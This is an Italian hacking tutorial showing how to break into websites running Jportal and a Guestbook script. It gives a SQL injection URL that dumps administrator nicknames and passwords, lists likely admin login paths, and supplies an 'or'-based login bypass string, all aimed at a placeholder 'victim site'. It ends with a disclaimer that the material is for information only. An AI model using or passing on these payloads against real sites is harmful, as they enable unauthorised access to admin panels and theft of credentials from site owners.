Come ben sappiamo e abbiamo appreso nei precedenti articoli, per “hackerare” un sito, ovvero entrare a conoscenza di info riservate, non dobbiamo per forza usufruire di programmi specializzati a questo fine, bensì, nella maggior parte dei casi, l’hacker si ritrova a dover fronteggiare una vulnerabilità che semplicemente mediante l’utilizzo di specifici codici permette di portare a compimento l’attacco. Anche oggi ci andremo ad occupare di come riuscire ad evadere le protezioni dei servizi online, nel nostro caso Jportal e Guestbook; senza esitazione, partiamo subito! Il Jportal è ben conosciuto proprio per la semplicità di trovare falle in questo servizio; trovato il sito vulnerabile, possiamo accedere al pannello di amministrazione modificando la URL nel modo illustrato nella seguente riga:

https://www.sitovittima.it/print.php?…d=1%20AND%201=
0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,i d%20
from%20admins%20LIMIT%201

(tutto attaccato)

Bene, adesso invece occupiamoci del caso in cui ci troviamo di fronte a un sito Guestbook potenzialmente vulnerabile; rispetto alla vulnerabilità Jportal, questa volta dovremo andare a lavorare sul pannello di accesso dell’amministratore. Pertanto come falla è molto simile a quella dei siti ASP. Ricordo che per raggiungere il pannello di amministrazione potrebbe essere opportuno inserire i seguenti codici nella struttura url del sito da attaccare:

www.sitoguestbookvulnerabile.it/admin/login.php

www.sitoguestbookvulnerabile.it/admin.php

Una volta raggiunta l’interfaccia di autenticazione admin, procediamo come elencato

nome utente: ‘or ‘jr7’=’jr7’ /*

password: qualsiasi

Se il tutto è andato a buon fine il nostro pentest sarà riuscito.

Inutile ricordare che per qualsiasi uso scorretto che farete di questo articolo, noi non ci assumiamo alcuna responsabilità delle vostre azioni; pertanto ricordiamo che questi contenuti sono unicamente ed esclusivamente creati per fini informativi e non intendono incitare nessun terzo a compiere azioni illegali in rete, severamente punibili dalla legge.